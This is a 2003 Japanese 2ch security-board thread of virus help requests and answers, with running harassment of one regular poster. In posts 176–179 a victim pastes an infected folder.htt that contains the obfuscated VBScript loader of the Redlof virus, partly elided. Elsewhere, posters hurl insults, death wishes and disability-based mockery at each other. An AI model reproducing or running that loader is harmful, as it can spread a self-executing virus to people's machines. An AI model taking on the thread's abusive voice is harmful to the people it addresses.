
99 :名無しさん@お腹いっぱい。:03/11/10 00:00
すみません質問させて下さい。
怪しいexeファイルをクリックしてPE_PARITE.A(とB)に感染しました
アンチドートとトレンドマイクロオンラインスキャンを使って感染しているのを全部削除したまではいいんですけど再インストールを行っても
また感染してしまいます。
あと分からないことが感染しているファイルと感染しないファイルがある事です。
FFDSHOWなどは感染しましたがopenjaneやvixなどは感染しません、何回スキャンしても

どうしたら完全に削除できるのでしょうか?やはりノートンやバスターで駆除しないとだめでしょうか

100 :名無しさん@お腹いっぱい。:03/11/10 00:12
>>99
お前http://pc.2ch.net/test/read.cgi/sec/1068300966/78n-読んだか?

101 :名無しさん@お腹いっぱい。:03/11/10 00:53
OSや環境は?
再インストールはOSなのか?
基本的にtrendmicro
ttp://www.trendmicro.co.jp/vinfo/default.asp?sect=TT
やsymantec
ttp://www.symantec.com/region/jp/sarcj/index.html
で調べれば、自分で対処出来る。


102 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 08:52
>>99

>再インストールを行ってもまた感染してしまいます。


PE_PARITE.A(とB)はOS再インストールすれば消えるはずですが?
再起動のと書くつもりだったんですか?
Windows XPやMEのようなシステム復元機能を持つOSの場合、
復元ポイントにウィルスが混入してると削除しても再起動すれば
復元されてしまうそうです。
シマンテックはPE_PARITE.AをW32.Pinfiと呼んでますが、
その説明のページを御覧ください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.pinfi.html
>Windows Me/XPをお使いの場合は、駆除作業を行う前にシステムの
>復元オプションを一時的にオフにしてください。システムの復元
>機能は、Windows Me/XPの機能の一つで、標準では有効に設定されて
>います。この機能は、Windowsがコンピュータ上のファイルが破損
>した場合にそれらを自動的に復元するために使用されます。
>コンピュータがウイルス、ワーム、またはトロイの木馬に感染した
>場合、ウイルス、ワーム、またはトロイの木馬のバックアップ
>ファイルが_RESTOREフォルダ内に作成されている可能性があります。
>Windowsは、ウイルス対策プログラムのような外部プログラムによる
>システムの復元機能の改変を防止するように設定されています。
>この理由により、ウイルス対策プログラムおよび駆除ツールでは
>_RESTOREフォルダ内に保存されている感染ファイルを削除する
>ことはできません。その結果、他のあらゆる場所から感染ファイル
>を削除した後でも、感染したファイルが誤って復元される可能性
>があります。


103 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 09:01
>>99(質問の後半)

>あと分からないことが感染しているファイルと感染しないファイル
>がある事です。
>FFDSHOWなどは感染しましたがopenjaneやvixなどは感染しません


シマンテックのW32.Pinfi(PE_PARITE.A)の説明では、最終的には
すべての.EXEファイルに感染するとありますが、一度には数ファイル
しか感染しないそうですので、openjaneやvixが後回しになっていた
だけでは?
http://www.symantec.com/region/jp/sarcj/data/w/w32.pinfi.html
>全ローカルドライブおよびマッピングされているドライブ上で
>発見したすべての.EXEファイルおよび.SCRファイルの末尾に
>自分自身を付加します。このウイルスには、感染速度を遅くする
>アルゴリズムが含まれているため、1度に数ファイルにしか
>感染しません。



104 :萩パンウーザー ◇Asperger:03/11/10 12:15
>>35
薮パソユーザーさんに質問。

どうして「TOKAIネットワーク」と契約しているのにLivedoorを使って書き込み
しているのですか?


207 名前:"削除"依頼 投稿日:03/09/09 20:06 HOST:izu0370.izubr2.thn.ne.jp<8080>




超亀レスでスマソが、izu0370.izubr2.thn.ne.jpはTOKAIネットワークとは別だと思われ。

105 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 14:16
上げておきます。

106 :質問者の方へ:03/11/10 14:35
このスレは>>1の自己満足の為だけに立てられました。
回答者は>>1しかいません。回答内容は自分でGoogleで検索すれば
わかる事か、または的外れで無駄な時間を費やす事になる内容ばかりです。

107 :名無しさん@お腹いっぱい。:03/11/10 15:21
今、PCの電源を落とそうとしたら「ほかの人がこのコンピュータにログインしています。その人のデータが失われる恐れがあります。」とダイアログが出た。
新しいPCを買ってOSはXPなんだけど、これってどういうこと?
このPCはオレ一人しか使ってないはずなんだけど。
集合住宅でもマンションでもないし、、、誰か教えてちょうだい

108 :名無しさん@お腹いっぱい。:03/11/10 15:23
>>107
ユーザの切り替え途中でしただろ?

109 :名無しさん@お腹いっぱい。:03/11/10 15:32
>>108
いえ、切り替え等はしてないです。今ウイルスバスターを見たら
「ブロックしたアクセスの種類:ICMP Echo Reply」とありました。
これは関係あるのでしょうか?

110 :名無しさん@お腹いっぱい。:03/11/10 16:03
共有しているプリンタが突然見えなくなる、
あるいは アクセスできなくなる。
これは何のウィルスにやられているんでしょう?


111 :名無しさん@お腹いっぱい。:03/11/10 16:11
ネットを開けなくなってしまいましたリンクとかもです・・・
他には僕が普通にやるだけならおかしい所が見当たりません
そうゆうウイルスがあるんでしょうか??

112 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 16:26
>>107

接続はブロードバンドですか?
侵入かどうかはわかりません。
もしかしたらXP以前のソフトでXPに適合してないソフトが終了
できないのが原因かもしれません。
また、回線に接続中のソフトがあったのかもしれません。
ただ、侵入の可能性も否定できないのでPestPatrolとアンチドートを
かけてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504
尚、以下の対策も採ってください。
http://bb.softbankbb.co.jp/support/tech/windows/winxp_security.php
http://www.st.ryukoku.ac.jp/~kjm/ms-windows/dcom/



http://bb.softbankbb.co.jp/support/tech/windows/winxp_security.php

113 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 16:31
>>110

そういう質問する前にウィルスチェックしてください。
アンチドートを使ってください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504


114 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 16:37
>>111

そういう質問する前にウィルスチェックしてください。
アンチドートを使ってください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

それから、↓も御覧ください。
http://www.dianet.or.jp/antivirs/base/othrtype.htm

115 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 16:54
>>111

ADSLなら接続が切れてないかモデムのランプをみてください。
回線状態が悪いADSL回線では時々接続が切れる場合もあります。

116 :名無しさん@お腹いっぱい。:03/11/10 17:31
アンチトード アンチトード

おい!そこのモーホー野郎↓

ウンチどぉ〜?

117 :名無しさん@お腹いっぱい。:03/11/10 17:32
>>101>>102>>103
ご意見どうもありがとうございます
再インスコというのはプログラム自体を再インスコしただけでOSの再インスコはしていません
以前薮パソユーザーさんからアンチドートを勧められたのでそれを使って除去しようと思って昨日夜中まで頑張っていたのですが
手動は削除は厳しく、どれが感染しているかの一覧もわかりづらいのでまだ残っていたみたいです
今日のAM4時くらいにAVGを入れて試したところ大量に発見して隔離してくれたのでもしかしたら大丈夫かもしれません

以前outpostfreeも勧められたのですがそれももっといい火壁ソフトがあるんでしょうか。。。

118 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 17:52
>>117

削除できないのが残ってたら(復元機能があるなら一旦無効にして)
セーフモードで削除してください。

>以前outpostfreeも勧められたのですがそれももっといい火壁ソフトが
>あるんでしょうか。。。


どんなファイヤーウォールで防げるウィルスは少数です。
ファイヤーウォールの問題ではありません。
PE_PARITE.Aに感染したのはファイヤーウォールが原因ではないですよ。
ただ、アンチドートは常駐型ウィルス対策ソフトでないのでWindows update
してなかったり、怪しいファイルを実行したり、ファイヤーウォールが
なかったりすれば感染の危険はあります。AVGなら常駐型ウィルス対策
ソフトなのでそういう危険は非常に少なくなるでしょう。


119 :名無しさん@お腹いっぱい。:03/11/10 18:30
XPです。
数日前,MXにルーター・壁なしで接続してました。
すると,ASP.net MachineAというアカウントが作られていました。
ウイルス検索では,何も出てきませんでしたが,
あわてて壁の設定をして,そのアカウントは消しました。

これから何か障害が起こるでしょうか?
また,System Volume Informationに,アクセスできない状態なのですが,
これは,元々でしょうか・・・
対策等ありましたら,教えてください。

120 :名無しさん@お腹いっぱい。:03/11/10 18:36
藪医者には気を付けましょう。
頼んでもいない薬まで、処方される危険が有ります。

121 :名無しさん@お腹いっぱい。:03/11/10 19:16
>>119
そりゃXPでWindows Updateすると勝手に作られるアカウントだろ。

122 :名無しさん@お腹いっぱい。:03/11/10 19:16
■■■■■■■■■■■■■重要■■■■■■■■■■■■■


質問される方は、
ttp://www.geocities.co.jp/SiliconValley-Sunnyvale/3094/
をよくお読みになってから質問してくださいね。



■■■■■■■■■■■■■重要■■■■■■■■■■■■■

123 :名無しさん@お腹いっぱい。:03/11/10 19:19
246 名前: "削除"依頼 投稿日: 03/11/09 13:00 HOST:63.22.244.43.ap.livedoor.jp<8080><3128><8000><1080>

削除対象アドレス:
http://pc.2ch.net/test/read.cgi/sec/1068300966/27
http://pc.2ch.net/test/read.cgi/sec/1068300966/32

削除理由・詳細・その他:
偽スレ(重複スレ)への誘導目的でコテハン叩き目的で
混乱が起きる危険がありますので早急に削除願います。

247 名前: 削除屋@悪魔のZ ★ 投稿日: 03/11/10 10:48 ID:???

>>246
スレッド削除依頼が出ているので保留します。

#先にそのスレッドの持っている問題を住民の方々で話しあわれたらどうでしょう。

124 :120:03/11/10 19:21
へぇ,知りませんでした。
ハズカスィ 

 _| ̄|○ 

逝って来ます・・・

125 :名無しさん@お腹いっぱい。:03/11/10 19:27
藪はlivedoorか……

126 :名無しさん@お腹いっぱい。:03/11/10 20:09
>>114
アンチドート・・・??アンチウイルスとは違うんですかね・・・。分からない・・・
>>115
モデムのランプはついてますね

127 :名無しさん@お腹いっぱい。:03/11/10 20:15
>>126
IEだけが繋がらない・メールソフト等も繋がらないのどっち?
DNSも駄目?

128 :名無しさん@お腹いっぱい。:03/11/10 20:44
>>127
メールソフトはつながります
DNSは何なのか分からないです。

129 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 21:01
>>126

アンチドートはウィルス検査ソフトです。
有名なのが良ければトレンドマイクロオンラインスキャンでも
してきてください。

130 :名無しさん@お腹いっぱい。:03/11/10 21:05
>>128
http://203.141.35.113/
YahooのIPアドレスだけど、これで表示されるならDNSの問題。
それでもダメなら別問題だね。

131 :名無しさん@お腹いっぱい。:03/11/10 21:05
藪医者痛すぎ

132 :薮パソユーザー ◆0fQkHdNop2 :03/11/10 21:12
>>119

>ASP.net MachineAというアカウントが作られていました。


それはMicrosoft .Net Frameworkをインストールするとできるそうです。
http://www.mvps.org/marksxp/windowsxp/aspdot.htm
>The aspnet_wp or ASP.NET Machine Account is created
>when the Microsoft .Net Framework 1.1 is installed onto
>a Windows XP computer.


>また,System Volume Informationに,アクセスできない状態なのですが,


XP proですか?私はXP homeなのでよくわかりませんが、
システムの復元を一旦無効にしてください。



133 :名無しさん@お腹いっぱい。:03/11/10 21:13
>>132
>>121

検索遅すぎ。

134 :名無しさん@お腹いっぱい。:03/11/10 21:20
>>132
ttp://www.asahi-net.or.jp/~fe3s-mrkm/
アスペルガー症候群について、ここで相談してみてください。

135 :名無しさん@お腹いっぱい。:03/11/10 21:21
>藪
カキコする前に重複するレスがないか確認しろよw

136 :名無しさん@お腹いっぱい。:03/11/10 21:40
自分以外のカキコは見てないんだろう

137 :名無しさん@お腹いっぱい。:03/11/10 21:42
質問さえ読んでないからなー>藪

138 :名無しさん@お腹いっぱい。:03/11/10 21:44
藪パソ、これフリーペーパーに載ってたぞ。
あ、ネットランナーだった(w

139 :名無しさん@お腹いっぱい。:03/11/10 22:26
XP proですか?私はXP homeなのでよくわかりませんが、
XP proですか?私はXP homeなのでよくわかりませんが、
XP proですか?私はXP homeなのでよくわかりませんが、

140 :名無しさん@お腹いっぱい。:03/11/10 23:28
大きな態度取ってる割に知らない事も多い藪タソ

141 :名無しさん@お腹いっぱい。:03/11/11 00:12
sage進行

142 :名無しさん@お腹いっぱい。:03/11/11 00:14
藪が勘違いしてる所が手に負えないな。的外れなのに・・・

143 :名無しさん@お腹いっぱい。:03/11/11 00:24
みんな、藪じゃなくて薮(やぶ)だよ。


144 :名無しさん@お腹いっぱい。:03/11/11 00:38
藪じゃくなて薮蚊

145 :107:03/11/11 01:36
遅くなりましたがレスありがとうございました。
リンク先を参照しながら色々調べてみたいと思います。

146 :名無しさん@お腹いっぱい。:03/11/11 09:42
藪も読みは"やぶ"だよ

147 :薮パソユーザー ◆0fQkHdNop2 :03/11/11 11:04
上げときます。

148 :薮パソユーザー ◆0fQkHdNop2 :03/11/11 12:19
>>107

Windows updateは必ずしてください。特に米国時間の第二火曜日、つまり、
日本時間で明日。
それから、不要なアカウントやゲストアカウントもオフにしといて
ください。また、XP homeの場合、セーフモードで起動してAdministrator
アカウントにもパスワード設定してください。


149 :質問者の方へ:03/11/11 12:28
このスレは>>1の自己満足の為だけに立てられました。
回答者は>>1しかいません。回答内容は自分でGoogleで検索すれば
わかる事か、または的外れで無駄な時間を費やす事になる内容ばかりです。

貴方の時間の節約の為に、ここで質問する前にGoogle等で検索してみましょう。
>>1の回答よりも適切な回答が得られる可能性が大です。

150 :名無しさん@お腹いっぱい。:03/11/11 12:43
w2k,sp1適用,AVG-Anti-Virus導入済みで、
Windows MediaPLayer使用時に
□□■
□□□
□□□
上記の形のものが画面上に常にあるのですが、
これはウィルスなのでしょうか?
もしくはスパイウェアでしょうか?

除去するにはどうしたらよろしいでしょうか?
よろしくお願いいたします。

151 :名無しさん@お腹いっぱい。:03/11/11 13:09
>>150
>>149

152 :薮パソユーザー ◆0fQkHdNop2 :03/11/11 14:53
>>150

スパイウェアはad-awareとspybotでスキャンしてください。
ウィルスはアンチドートでスキャンしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

それからWindowsはupdateしてください。
(WMPもupdeateしてください。)


153 :名無しさん@お腹いっぱい。:03/11/11 15:13
薮パソユーザーは以下の自分の投稿の意味を説明してください。

67 名前:薮パソユーザー ◆0fQkHdNop2 [sage] 投稿日:03/10/24 22:30
>> 60
ステルスというだけでは実際はopenでもopenだという信号を止めて
いれば外部のポートスキャンだけではステルスなのでBlockしている
と評価されます。常識的にはステルスならBlockと思うが絶対の
保証はありません。openでもステルスにすればメリットがある
からです。
デフォルトで閉じるより(危険ではあっても)自由度があり、
しかも、相手普通のハッカーで手動で単に踏み台を適当に探している
だけなら応答がなければあきらめる可能性が非常に高いのでステルス
でさえあれば実際にはopenであっても効果はあります。
だから、outpostがステルスであってもopenでないとは断言でき
ません。常識的にはinboundはBlockされているとは思いますがね。
尚、outboundはBlockされていないのはほぼ確実でしょう。

154 :名無しさん@お腹いっぱい。:03/11/11 15:21
薮パソユーザーはウィールスに感染するのはエロサイトに行く不注意
な人間だけだと主張しています。皆さんはどうお考えでしょうか?

☆ウィルス情報&質問 総合スレッド☆Part14
http://pc.2ch.net/test/read.cgi/sec/1064028518/
一部のエロサイト等のアングラサイトのような危険なサイトにさえ
行かなければ悪質スクリプトコードや特に悪質なスパイウェアの心配は
ないでしょうから、軽微なスパイウェアは気にせず安全なサイトにしか
行かない人で注意深く用心してる人にはウィルス対策ソフトは不要とも
考えれます。

155 :名無しさん@お腹いっぱい。:03/11/11 15:23
薮パソユーザーは自分の投稿の引用の削除依頼を出そうと
文面を推敲中です。

156 :名無しさん@お腹いっぱい。:03/11/11 15:42
このスレはニセモノです。ここに質問を書き込まないでください。

本物のスレは↓です。
【正式】ウィルス情報&質問 総合スレッド☆Part15

157 :名無しさん@お腹いっぱい。:03/11/11 15:50
薮は以前こんなテンプレの次スレ立ててスレスト喰らったことがある。
「私はもうテンプレを貼りません。住人が勝手に立てて下さい〜」とか言って。

>ここは一応は初心者を対象としたセキュリティー関係の質問スレです。
>注意:ネットワークセキュリティ@2ch掲示板は初心者に厳しい常連が多いです。
>以下の質問はここでは無視または攻撃対象にされる事があります。
>(1)セキュリティーに直接関係しない質問
>(2)ウィルスチェックをせずにする質問
>(3)Googleで検索せずにする質問
>(4)同様の質問を他所でしながらする質問(マルチ質問)
>(5)OS等の環境を明示せずにする質問
>ここで、質問する前に、
>(1)ウィルスチェックはされましたか?
>(2)Windows等のマイクロソフト製品利用者はマイクロソフトTechNetを
>http://www.microsoft.com/japan/technet/default.asp
>を御覧になりましたか?
>(3)Googleで検索されましたか?(Googleでヒットしたウィルス対策ソフト会社の
>サイトの方が確実な知識が入手できます。)
>精神衛生上、ここより他所で質問する方が良くはありませんか?
>たとえば、2chでもパソコン初心者@2ch掲示板の
>http://pc2.2ch.net/pcqa/index.html
>「パソコン初心者板総合質問スレッド」または
>「エロサイト見たら・・・助けてください!」スレはいかがですか?

158 :名無しさん@お腹いっぱい。:03/11/11 16:27
薮パソユーザーさんは>>153の質問に答えてください。

159 :名無しさん@お腹いっぱい。:03/11/11 16:34
薮パソユーザーさんは以下の批判に対してどう思われますか。回答ねがいます。

セキュリティ初心者質問スレッドpart32
http://pc.2ch.net/test/read.cgi/sec/1066831852/780
質問に回答者が正確な誘導>>685してるところへ
 >>686
 > 信じて良いものやら?私には見当がつきません。
と「なんでも復元+意味なしバカレス」で割り込み。
知らないことにレスすんな、とたしなめられると
 >>717
 > 後では何とでも言えます。
と、自分が後から割り込んだくせに指摘者を誹謗。
他スレで「Windowsのパスワードの方がBIOSパスワードより強力」と電波
カキコ。アフォと指摘されると、
 >>686
 > Windowsのパスワードの場合にはHDDはずして盗んで帰って別の
 > パソコンにつながねばならず、手間が全然違います。これだと警察に
 > つかまりやすいので滅多に起きない事件でしょう。
とWindodwsのパスを無効にする方法を知らないことを暴露する薮電波をさらに発信
 >>694
 > まだしつこくデタラメ撒いてくれてますな。Windowsの管理者パスがBIOSパス
 > より強力だという理由はまったくない。
と証拠をあげて無知を暴露されると、
 >>699
 > HDDが1個、パーティションも1個という初心者に圧倒的に多い
と全然関係ないバカ理屈を並べて抵抗、それも通らなくなると、
772 名前:薮パソユーザー ◆0fQkHdNop2 [sage] 投稿日:03/11/06 10:41
 >>768
 > パソコン買ってすぐに脱初心者なのは少数でしょう。
 > 文系人間だったらだいたい3年くらいは初心者ですよ。
と、いわれのない差別発言で現在に至っております。


160 :名無しさん@お腹いっぱい。:03/11/11 16:39
藪パソみたいな奴が新興宗教に入るんだろうね。

161 :名無しさん@お腹いっぱい。:03/11/11 16:59
薮パソユーザーさん。あなたはこの警告に削除依頼を出してくれましたが、どこに
問題があったのですか? 全部本当のことではありませんか? どこかに間違い
があるなら指摘してください。
????????????????????????????? 藪パソウィールス警告 ????????????????????????????
粘着コテハンウィールス[薮パソユーザー ◆0fQkHdNop2]は2chセキュ板に感染
すると次のいずれかの活動を行います。

1 なんにでもアンチドートを勧める(危険度・低)
2 なんにでも復元ポイントを勧める(危険度・中)
3 ネットランナー今年の1月号の受け売り(危険度・中、アフォ度・高)
4 ピント外れ意味なしor大きなお世話or大恥カキコ(危険度・中、アフォ度・高)
5 大嘘を教える(危険度・高)
6 大嘘を指摘されると逆ギレして指摘者を誹謗(迷惑度・高)

現在のところ駆除・隔離に失敗。初心者および最近セキュ板に来た皆さんは十分
注意してください。(この警告のコピペを推奨します)
???????????????????????????????????????????????????????????????????????????????????


162 :名無しさん@お腹いっぱい。:03/11/11 17:22
藪は字を読めません。妄想で勝手に解釈して書きこんでます。

163 :名無しさん@お腹いっぱい。:03/11/11 18:16
dd

164 :名無しさん@お腹いっぱい。:03/11/11 18:57
>>159
死ね

165 :名無しさん@お腹いっぱい。:03/11/11 19:00
>>164
トリップ付け忘れてますよ

166 :名無しさん@お腹いっぱい。:03/11/11 19:06
>>153-162
コピペ死ね

167 :TT:03/11/11 19:14
すみません。教えてください。
別な板で。間違えて、
//www2.strangeworld.org/slot/riko/img-box/2003043.jpg
をクリックをしてしまいました。
で、オンラインウイルスチェックしたら、HTML_SUAR.Aが発見されました

つたない知識で、調べた結果、その時のpcを不調にしてしまうもので
他の被害はないと判断しましたが、間違いないでしょうか?

とりあえず、対策としてはAVG Free Edition を導入し、ウイルスの削除と
今後の対策をしようと思っています。が、問題ないでしょうか?

ご教授下さい。よろしくお願いします。


168 :名無しさん@お腹いっぱい。:03/11/11 19:16
>>167
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A

HTML_SUAR.Aで検出したものを全て削除してOK。
AVG Free Editionで一応はウイルス対策にはなります。

169 :TT:03/11/11 19:23
すみません。教えてください。
別な板で。間違えて、
//www2.strangeworld.org/slot/riko/img-box/2003043.jpg
をクリックをしてしまいました。
で、オンラインウイルスチェックしたら、HTML_SUAR.Aが発見されました

つたない知識で、調べた結果、その時のpcを不調にしてしまうもので
他の被害はないと判断しましたが、間違いないでしょうか?

とりあえず、対策としてはAVG Free Edition を導入し、ウイルスの削除と
今後の対策をしようと思っています。が、問題ないでしょうか?

ご教授下さい。よろしくお願いします。

なお、ウィルス情報&質問 総合スレッド☆Part15と
マルチになっておりますが、お許し下さい。

170 :TT:03/11/11 19:24
げ!
2重書き込みになってるTT
すみません。

>>168
どうも、ありがとうございました。


171 :名無しさん@お腹いっぱい。:03/11/11 20:47
>>166
トリップがありませんが。

172 :薮パソユーザー ◆0fQkHdNop2 :03/11/11 20:59
質問どうぞ。

173 :名無しさん@お腹いっぱい。:03/11/11 21:02
>>172
薮パソユーザー氏、板を荒らさないで下さい。

174 :名無しさん@お腹いっぱい。:03/11/11 21:06
????????????????????????????? 藪パソウィールス警告 ????????????????????????????
粘着コテハンウィールス[薮パソユーザー ◆0fQkHdNop2]は2chセキュ板に感染
すると次のいずれかの活動を行います。

1 なんにでもアンチドートを勧める(危険度・低)
2 なんにでも復元ポイントを勧める(危険度・中)
3 ネットランナー今年の1月号の受け売り(危険度・中、アフォ度・高)
4 ピント外れ意味なしor大きなお世話or大恥カキコ(危険度・中、アフォ度・高)
5 大嘘を教える(危険度・高)
6 大嘘を指摘されると逆ギレして指摘者を誹謗(迷惑度・高)

現在のところ駆除・隔離に失敗。セキュ板住人を煽るスレを立ててスレスト喰らった事も。
初心者および最近セキュ板に来た皆さんは十分注意してください。
???????????????????????????????????????????????????????????????????????????????????


175 :名無しさん@お腹いっぱい。:03/11/11 21:06
>>172
http://pc.2ch.net/test/read.cgi/sec/1068138433/l50

お前に対する質問たまってるぞ、キチガイ。


176 :名無しさん@お腹いっぱい。:03/11/12 01:25
MEを使ってます。
今日気づいたんですが、PC中のおそらく全フォルダにfolder.httという
ハイパーテクスト(不明なアプリケーション)の隠しフォルダが作られてました
すべてが同じ日時で14707バイトのものでした
これってウィルスですよね?
ワードで開いたら、以下のような記述がありました
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<style>
body {margin: 0; font: menu; color: windowtext}
#Panel {position: absolute; width: 200px; height: 100%; visibility: hidden}
#Corner {padding-left: 12px; padding-right: 0px; padding-top: 11px}
#FolderIcon {width: 32px; height: 32px}
#FolderName {margin-top: 8px; font: 13pt/13pt menu; font-weight: bold}
#LogoLine {width: 100%; height: 2px; margin-top: 4px; vertical-align: top}
#Details {padding-left: 12px; padding-right: 0px; margin-top: 8px}
#Locked {vertical-align: baseline}
.Divider {width: 100%; color: #C0C0C0; height: 1px}
#Thumbnail {width: 120px; height: 120px}
.Legend {margin-left: 8px; margin-right: 0px}
p {margin-top: 12px}
p.Half {margin-top: 4px}
button {font: 9pt MS UI Gothic; margin-left: 12px; margin-right: 0px; background: window; color: windowtext}
.Message {width: 100%; frameBorder: 0; background: infobackground; color: infotext; border: 1px solid lightgrey}
#CSCPlusMin {width: 17px}
#CSCText {}
#CSCDetail {}
#CSCButton {}

#FileList {position:absolute; width:0; height:100%; border:0}

177 :名無しさん@お腹いっぱい。:03/11/12 01:26
</style>
<body scroll=no>
<div id=Panel style="background: window URL(wvleft.gif) no-repeat left top">
<div id=Corner>
<object id=FolderIcon classid="clsid:844F4806-E8A8-11d2-9652-00C04FC30871" tabIndex=-1>
<param name="scale" value=100>
</object>
<br>
<div id=FolderName>
%THISDIRNAME%
</div>
</div>
<img id=LogoLine src="wvline.gif">
<div id=Details>
<span id=CSC>
<div tabIndex=2 id=CSCHotTrack>
<span id=CSCPlusMin>
</span>
<span id=CSCText>
</span>
</div>
<div id=CSCDetail>
</div>
<span id=CSCButton>
</span>
<hr CLASS=Divider NOSHADE>
</span>
<span id=Info>
</span>

178 :名無しさん@お腹いっぱい。:03/11/12 01:26
<br>
<span id=MediaPlayerSpan>
</span>

<object id=Thumbnail classid="clsid:71650000-E8A8-11d2-9652-00C04FC30871" tabIndex=-1>
</object>
<label id=ThumbnailLabel for="Thumbnail" style="display: none">
</label>

<span id=Links>
</span>
</div>
</div>
<object id=FileList classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" tabIndex=1>
</object>
<object id=WVCoord classid="clsid:BCFD624E-705A-11d2-A2AF-00C04FC30871">
</object>
</body>
</html>


179 :名無しさん@お腹いっぱい。:03/11/12 01:32
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest
HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET>
</div>"
</script>
<script language=vbscript>
ExeString = "Daf IfPhej^,HlflT]qt,N[sT]qt,<^gr]^Si_g,AhileG[je[m,FKH,WkLhede,WagPala
Sm[E,>bnadrDikdKnb CC_slZrt CCSel=im CCCr]ZteEbli]n()KJDbkeAm()KJ
;keal^Maae()KJHkopY`at]!)>ndLub>nnclbonDJAhien\Mo(>bleHZth$Myp]Ltr!
OfErjhr J^sue^ N]qtLetKea\Memh= >LO.GienL^xt>ble ?il]Iat`%1)TmhLtr6 R]Zd
T]fp.J^ad9elBf Agstj!TmhLtr$KJWltajm() <60 Gk L]g(TeiStj <* T`^nKea\Memh'
(膨大なので中略)
vbCrLf&"KeyArr(2) = 8"&vbCrLf&"KeyArr(3) = 7"&vbCrLf&"For i=1 To Len(ExeString)"&
vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrL
&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mo
d 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"Els
eIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>
</BODY>
</HTML>

以上です。
長々とすみませんが、よろしくお願いします。

180 :名無しさん@お腹いっぱい。:03/11/12 01:37
scanしたの?

181 :名無しさん@お腹いっぱい。:03/11/12 01:38
>>176
HTML.Redlof.Aじゃ ヴぉけ
ウイルスのソース貼るな!!


182 :176:03/11/12 01:54
すみませんでした。
先ほどスキャンしたら、やはりHTML.Redlof.A でした。
これを駆除するにはどうすればよいですか?
単純に検索削除でよいでしょうか?
どうか教えてくださいm(_ _)m

183 :名無しさん@お腹いっぱい。:03/11/12 01:57
駆除方法はそのスキャンしたサイトに書いてあるはずなんだけど・・・

184 :名無しさん@お腹いっぱい。:03/11/12 02:21
おまえ藪だろ>176

185 :名無しさん@お腹いっぱい。:03/11/12 09:20
>>181
マカフィーだと、VBS/Redlof@Mだな!

186 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 10:59
>>176

WindowsをupdateしてたらRedlofなんかには感染しないんですけどね。
毎月第二火曜の翌日はWindowsのupdateの日としてWindowsをupdate
してください。今日、駆除したらすぐにupdateしてきてください。

Redlofに詳しいサイト

トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4700

シマンテック
http://www.symantec.com/region/jp/sarcj/data/h/html.redlof.a.html

ホームページを見ただけで感染するREDLOF.Aウィルス情報
http://members.jcom.home.ne.jp/aisora/subREDLOF.htm

個人が製作した無料ワクチンソフト・RedLofster (自己責任でどうぞ)
http://hp.vector.co.jp/authors/VA029423/windows.htm


187 :名無しさん@お腹いっぱい。:03/11/12 11:02
インストールについての質問はここでいいですか?

188 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 11:25
>>187

Windowsの再インストールは「パソコン初心者板総合質問スレッド」
http://pc2.2ch.net/test/read.cgi/pcqa/1068547517/l50

Windows updateは「緊急! WindowsUpdateをしましょう! 」
http://pc.2ch.net/test/read.cgi/sec/1060956936/l50

Linuxの場合は「初心者にも優しい総合質問スレ 」
http://pc.2ch.net/test/read.cgi/linux/1067437547/l50

Macの場合は「Mac初心者質問スレッド」
http://pc.2ch.net/test/read.cgi/mac/1068299273/l40


189 :名無しさん@お腹いっぱい。:03/11/12 11:38
>>186
>毎月第二火曜の翌日はWindowsのupdateの日としてWindowsをupdate

この日じゃないとだめなんでしょうか

190 :名無しさん@お腹いっぱい。:03/11/12 11:48
薮パソユーザー◆0fQkHdNop2 はセキュリティ初心者質問スレッドpart32
http://pc.2ch.net/test/read.cgi/sec/1066831852/686などで「Windowsの
管理者パスワードの方がBIOSパスワードより強力」という誤った主張を執拗に
くりかえしてきたところ「Windowsの管理者パスワードを簡単に無効にする方法
がある」と他の投稿者に指摘されました。薮パソユーザーは自ら検索もせず、
これに対して下記のような暴言を吐きました。

http://pc.2ch.net/test/read.cgi/sec/1068138433/55-56
名前:薮パソユーザー ◆0fQkHdNop2 [sage] 投稿日:03/11/11 20:47
> そういう手法が披露されてるHPはありますか?
> アホ臭くて物も言えない。
> 口だけならNASAとかペンタゴンとかCIAのサイトのハックに
> 1分だとか何とでも言えますよ。

Windowsの管理者パスのクラック方法のソースをこういう場で公表するのが
適当か否かということが薮パソユーザーの頭では判断できないようです。
そこでこのマイクロソフト技術情報のページを紹介しておきます。

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/news/efs.asp
> Are there tools that allow an attacker to reset the Administrator account
> password to a known value?
> 攻撃者が管理者パスワードを任意の値に書き換えることができるツールが
> 存在しますか?
>
> Yes.
> イェス

薮パソユーザーは間違いに固執していたことを認め、暴言を謝罪しなさい。

191 :190:03/11/12 11:49
